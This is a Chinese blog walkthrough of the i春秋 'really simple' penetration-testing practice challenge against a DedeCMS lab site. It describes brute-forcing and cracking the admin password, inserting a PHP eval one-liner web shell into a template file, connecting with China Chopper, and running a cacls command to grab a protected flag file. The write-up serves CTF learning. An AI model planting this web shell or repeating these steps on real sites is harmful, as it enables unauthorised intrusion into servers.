美文网首页
i春秋渗透模拟“真的很简单”(?

i春秋渗透模拟“真的很简单”(?

作者: jun123123 | 来源:发表于2019-10-02 23:22 被阅读0次

i春秋渗透模拟第一题,真的很简单(并不
照着别人wp做的
进入后界面如下,


1.png

点击开始答题后出现第一题为后台密码


2.png
这里就不知道咋做了。。。
后来看了下wp发现提示了要用给出的地址下载dedecms爆破密码(为啥我没有),如下图:
3.png

访问该地址下载dedecms工具后直接爆破得出用户名ichunqiu和md5加密后的密码:adab29e084ff095ce3eb

4.png
然后去https://www.cmd5.com/
上解密发现要付费???
在这里解密成功得到密码:only_systemhttps://www.somd5.com/
5.png
提交后出现第二题为后台目录
6.png

又不会了,继续看wp

7.png
8.png
可知目录名为lichunqiul,提交后出现第三题
9.png
首先用第一步得到的用户和密码以及第二步得到的路径登入后台
10.png
要求我们获取桌面的文件,需要构造webshell连接服务器,要找到可以上传文件的地方,但是既然已经登入,直接修改已存在的文件即可。
找到模板-标签源码管理,选择一个,编辑,在第一行加上<?php @eval($_POST["cmd"]);?>然后保存。打开中国菜刀,
11.png
(完整地址为http://www.test.ichunqiu/include/taglib/adminname.lib.php,即加入shell的文件)
连接后找到flag文件后双击为空白,看wp知道是因为权限原因,虚拟终端查看权限
12.png
发现是因为权限不足,用
cacls flag~ichunqiu.txt /E /P system:F
命令更改权限,之后再双击即可得到flag:
13.png
提交后即完成全部题目
(注意仅提交大括号内部分)

总结:看了别人wp之后,题目就会变简单

相关文章

  • i春秋渗透模拟“真的很简单”(?

    i春秋渗透模拟第一题,真的很简单(并不照着别人wp做的进入后界面如下, 点击开始答题后出现第一题为后台密码 访问该...

  • i春秋-真的很简单

    基于织梦CMS的网站进行渗透测试,找到网站登录后台,进而入侵服务器找flag文件。 爆密码 漏洞利用工具爆织梦后台...

  • Web渗透测试之逻辑漏洞挖掘

    Web渗透测试之逻辑漏洞挖掘i春秋 补天漏洞响应平台视频原地址:https://www.ichunqiu.com...

  • 渗透测试入门 —— 真的很简单

    1.本题是渗透测试入门的一道基础题,虽然美其名曰“真的很简单”,但对于新手还是有一定挑战性的,实践并掌握本题中的所...

  • CVE-2018-8174漏洞复现及内网渗透攻击

    本文已在i春秋论坛发表 本文涉及的知识点: CVE-2018-8174漏洞复现、内网渗透、权限维持、脚本编程、痕迹...

  • 2.渗透流程及HTTP协议

    1.渗透流程 1.1. 什么是渗透: 模拟黑客,找到企业中的漏洞,给企业相关建议 1.2. 常规渗透: 1.得到授...

  • 戏说春秋_i春秋 writeup

    《戏说春秋》第一关 图穷匕见 题目: 解:用winhex打开,拉到最后可发现一段编码 放到解密网站上解码。 《戏说...

  • #我的笔记#web渗透

    The first day,fighting. Web渗透测试: 渗透测试是对系统安全性的测试,通过模拟恶意黑客的...

  • [i春秋]Web

    “百度杯”CTF比赛 2017 二月场_爆破-1 题目内容:flag就在某六位变量中。 打开页面给出了源代码: 看...

  • i春秋writeup

    1.sql 题目地址http://baabb3c37fcb429b9a2a71dbe623a29ee49724ec...

网友评论

      本文标题:i春秋渗透模拟“真的很简单”(?

      本文链接:https://www.haomeiwen.com/subject/soirpctx.html